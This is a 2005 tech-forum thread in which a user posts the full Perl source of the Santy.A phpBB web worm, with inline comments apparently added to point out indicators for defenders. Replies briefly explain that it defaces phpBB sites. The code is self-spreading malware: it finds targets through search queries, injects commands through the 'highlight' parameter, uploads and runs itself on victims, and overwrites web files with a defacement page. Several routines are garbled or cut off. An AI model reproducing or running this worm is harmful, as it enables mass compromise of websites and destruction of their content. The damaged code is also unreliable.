Tutorials This section offers tutorials and How to's on just about anything related to computers and IT. Note: All tutorials are courtesy the posters and not verified by Digit

Old 17-09-2005, 10:55 PM   #1 (permalink)
Right Off the Assembly Line
 
wolvrine's Avatar
 
Join Date: Jul 2005
Location: http:404 not found
Posts: 33
Default santy.a source code

This is the source code of the phpBB worm Santy.A.

Code:
# 
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept) 
#                          ~~ For educational purpose ~~ 
# 
# See : http://isc.sans.org/diary.php?date=2004-12-21 
#          http://www.k-otik.com/news/20041221.phpbbworm.php 
#          http://www.f-secure.com/v-descs/santy_a.shtml 
# 
#!/usr/bin/perl 
use 
strict; 
use Socket; 


# Forward declarations (with prototypes) of the routines defined below the
# main script body.
sub PayLoad(); 
sub DoDir($); 
sub DoFile ($); 
sub GoGoogle(); 

sub GrabURL($); 
sub str2chr($); 

# ---------------------------------------------------------------------------
# Main body. Analyst summary of what the visible code does, in order:
#   1. detaches from the launching process,
#   2. loads its own text into memory and deletes its file,
#   3. checks that it can reach the search engine,
#   4. loops forever: asks GoGoogle() for candidate viewtopic.php URLs, probes
#      each one through the `highlight` query parameter, and on a positive
#      probe copies itself to the remote host and starts the copy.
# Indicators visible in this block (useful for log and disk triage):
#   - requests whose query string contains `highlight=%2527%252E`
#   - a file named `m1ho2of` in the web application's working directory
#   - the marker string `HYv9po4z3jjHWanN` in HTTP responses
# ---------------------------------------------------------------------------

# `fork and exit` ends the parent; only the child continues. The eval keeps
# the script going if fork itself throws.
eval{ fork and exit; }; 

# Generation counter carried inside the script text. The defacement routine
# (PayLoad) is only called once this value exceeds 3.
my $generation = x; 
PayLoad() if $generation > 3; 

# Read this script's own text into $self, then delete the script file ($0).
# Defender note: after this point the running copy has no file on disk under
# its original name, so triage should include the process list, not only the
# filesystem.
open IN, $0 or exit; 
my $self = join '', <IN>; 
close IN; 
unlink $0; 

# Reachability check against the search engine. While the fetch fails:
# generation > 3 runs PayLoad() and retries, otherwise the script exits.
while(!GrabURL('http://www.google.com/advanced_search')) { 
if($generation > 3) 
{ 
PayLoad() ; 
} else { 
exit; 
} 
} 

# Increment the generation number inside the in-memory copy of the source,
# i.e. the copy that is sent onward carries generation + 1.
$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e; 

# Fixed file name and marker string -- both are stable indicators.
my $selfFileName = 'm1ho2of'; 
my $markStr = 'HYv9po4z3jjHWanN'; 
# Probe command: opens (creates) $selfFileName for writing and prints the
# marker to standard output, so the marker shows up in the HTTP response when
# the injected command was executed by the target.
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"'; 
# %2527 / %252E are double-URL-encoded "'" and "." -- the literal prefix
# `&highlight=%2527%252E` is what appears in the target's access log.
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527'; 

while(1) { 
# Kill switch: the script exits if a file named `stop.it` exists in its
# current directory (checked here and again for every candidate URL).
exit if -e 'stop.it'; 

OUTER: for my $url (GoGoogle()) { 

exit if -e 'stop.it'; 

# Replace any existing highlight parameter with the probe, fetch, and skip
# the candidate unless the response contains the marker string.
$url =~ s/&highlight=.*$//; 
$url .= $tryCode; 
my $r = GrabURL($url); 
next unless defined $r; 
next unless $r =~ /$markStr/; 

# Positive probe: send the script text in pieces of at most 20 characters,
# one request per piece, each appending to $selfFileName on the target.
# Defender note: this produces a long burst of near-identical viewtopic.php
# requests from one client, each with a `highlight=` value full of chr(NN).
while($self =~ /(.{1,20})/gs) { 
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '), 
' . str2chr($1) . '),exit%252e%2527'; 

$url =~ s/&highlight=.*$//; 
$url .= $portion; 

# Any failed request abandons this target and moves to the next URL.
next OUTER unless GrabURL($url); 
} 

# Final request: asks the target to run the uploaded file with perl.
my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527'; 
$url =~ s/&highlight=.*$//; 
$url .= $syst; 

GrabURL($url); 
} 
} 



# str2chr($s): re-encodes a string as a sequence of `chr(...)` terms joined by
# `%252e` (a double-URL-encoded "."), then strips the trailing `%252e`.
# Returns the encoded string. /s lets "." match newlines, so every character
# of the input is rewritten.
# Defender note: the output is why the worm's requests contain long runs of
# `chr(NN)%252e` in the `highlight` value -- a distinctive access-log pattern.
# NOTE(review): the substitution line below is garbled in this listing
# (extraction damage); it is left exactly as posted.
sub str2chr($) { 
my $s = shift; 

$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg; 
$s =~ s/%252e$//; 

return $s; 
} 


# GoGoogle(): target discovery through a public search engine.
# Builds one search query, fetches the first result page plus the result
# pages linked from its pagination bar, and returns the list of result URLs
# that contain `viewtopic.php`.
# Defender note: targets are taken from search results, not from a fixed
# list, so any publicly indexed forum URL matching the query can be picked.
# NOTE(review): parts of this routine are garbled in the listing (the
# statement after the first GrabURL call, and `. =` further down); the code is
# left exactly as posted.
sub GoGoogle() { 
my @urls; 
# Parameter names used in the query; one is picked at random per call.
my @ts = qw/t p topic/; 
# Query: allinurl "viewtopic.php" "<t|p|topic>=<random number below 30000>",
# 100 results per page.
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '& 
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) . 
'%22&btnG=Search'; 
my $goo1st = GrabURL($startURL) 
fined $goo1st; 
my $allGoo = $goo1st; 
# Pattern for the pagination links of the result page; capture 1 is the
# relative URL of a further result page.
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26 
alt="" border=0>
\d+</a>'; 
# Fetch every further result page and append its HTML to $allGoo.
while($goo1st =~ m#$r#g) { 
$allGoo . = GrabURL('www.google.com' . $1); 
} 
# Collect every href that points at a viewtopic.php URL.
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) { 
my $u = $1; 
next if $u =~ m#http://.*http://#i; # no redirects 
push(@urls, $u); 
} 

return @urls; 
} 


# GrabURL($url): minimal HTTP client built directly on sockets.
# Strips a leading "http://", splits the rest into host and path, sends one
# HTTP/1.0 GET with a fixed header set, and returns everything read from the
# socket (the raw response) as one string. Returns nothing (bare `return`)
# when the URL has no path, the host does not resolve, or the socket/connect
# call fails.
# Defender note: every request from this routine carries the same header set,
# including the fixed User-Agent string below and a Referer equal to the URL
# being requested -- useful when correlating access-log entries.
# NOTE(review): the request line inside the string below is garbled in this
# listing (extraction damage); it is left exactly as posted.
sub GrabURL($) { 
my $url = shift; 
$url =~ s#^http://##i; 

# $host = everything before the first "/", $res = the path and query string.
my ($host, $res) = $url =~ m#^(.+?)(/.*)#; 
return unless defined($host) && defined($res); 

my $r = 
"GET $resHTTP/1.0\015\012" . 
"Host: $host\015\012" . 
"Accept:*/*\015\012" . 
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" . 
"Pragma: no-cache\015\012" . 
"Cache-Control: no-cache\015\012" . 
"Referer: http://" . $host . $res . "\015\012" . 

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" . 
"Connection: close\015\012\015\012"; 

# Default port 80; a "host:port" form overrides it.
my $port = 80; 
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;} 

my $internet_addr = inet_aton($host) or return; 
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return; 
# Sets SO_RCVTIMEO with the value 10000; the return value is not checked.
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000); 

connect(Server, sockaddr_in($port, $internet_addr)) or return; 
# Turn on autoflush for the socket handle, then restore the selected handle.
select((select(Server), $| = 1)[0]); 
print Server $r; 

# Read until the peer closes the connection (the request asks for
# "Connection: close").
my $answer = join '', <Server>; 
close (Server); 

return $answer; 
} 


# DoFile($path): replaces the file at $path with a fixed defacement page.
# The page text is built from two q{} blocks with $generation concatenated
# between them. The original file is deleted first, then a new file is opened
# for writing at the same path; if that open fails the routine returns and
# the original content is already gone.
# Defender note: the strings "This site is defaced!!!" and
# "NeverEverNoSanity WebWorm generation" identify overwritten files; the
# original content is not kept anywhere by this code, so recovery means
# restoring from backup.
sub DoFile($) { 
my $s = q{ 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD> 
<BODY bgcolor="#000000" text="#FF0000"> 
<H1>This site is defaced!!!</H1> 
<HR><ADDRESS>NeverEverNoSanity WebWorm generation } 
. $generation .q{.</ADDRESS> 
</BODY></HTML> 
}; 

unlink $_[0]; 
open OUT, ">$_[0]" or return; 
print OUT $s; 
close OUT; 
} 


# DoDir($dir): recursive directory walk that hands matching files to DoFile().
# For every entry except "." and "..": a real (non-symlink) directory is
# descended into; any other entry whose name contains one of the substrings
# .htm .php .asp .shtm .jsp .phtm (case-insensitive, not anchored to the end
# of the name) is passed to DoFile(). Returns silently if the directory
# cannot be opened.
# Defender note: the set of affected files is bounded by what the account
# running the script can open and write -- presumably the web server's
# account; confirm per host. Tight filesystem permissions for that account
# limit the damage.
sub DoDir($) { 

my $dir = $_[0]; 
$dir .= '/' unless $dir =~ m#/$#; 

# Localised handle so that the recursive calls do not share one DIR handle.
local *DIR; 
opendir DIR, $dir or return; 

for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) { 

# Symlinks are never recursed into; `-d _` reuses the stat data from `-l`.
unless(-l $dir . $ent) { 
if(-d _) { 
DoDir($dir . $ent); 
next; 
} 
} 

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i 
or $ent =~ /\.phtm/i) { 
DoFile($dir . $ent); 
} 
} 

closedir DIR; 
} 


# PayLoad(): the destructive stage. Builds a list of starting directories and
# runs DoDir() on each of them.
# The list is seeded with field 7 of every getpwent() record (the account's
# home directory) and a root-path entry; the loop over 'A' .. 'Z' that follows
# is cut off in this listing, so what it adds is not visible here.
# NOTE(review): this routine is garbled and truncated in the listing (the sub
# name, the root-path literal and the A..Z loop); it is left exactly as
# posted and is incomplete.
sub Pay Load() { 

my @dirs; 


# getpwent is wrapped in eval so that platforms without it do not abort.
eval{ 
while(my @a = getpwent()) { push(@dirs, $a[7]);} 
}; 

push(@dirs, '/ '); 

for my $l ('A' .. 'Z') { 
push(@d 
for my $d (@dirs) { 
DoDir($d); 
} 
}

nice

Old 17-09-2005, 11:39 PM   #2 (permalink)
Human Spambot
 
tuxfan's Avatar
 
Join Date: Feb 2004
Location: Mumbai
Posts: 2,653
Default

What does this worm actually do?
__________________
:: Free hosting and free domain names available in special cases. Conditions apply ::
Old 18-09-2005, 08:56 PM   #3 (permalink)
Commander in Chief
 
QwertyManiac's Avatar
 
Join Date: Jul 2005
Posts: 6,657
Default

It's a Perl worm.

It exploits vulnerabilities in phpBB and defaces the sites using it...

Read More
http://www.sophos.com/virusinfo/anal...erlsantya.html

Pretty dangerous if you ask me, but with the recent PHP release, it's protected :d
__________________
Harsh J
www.harshj.com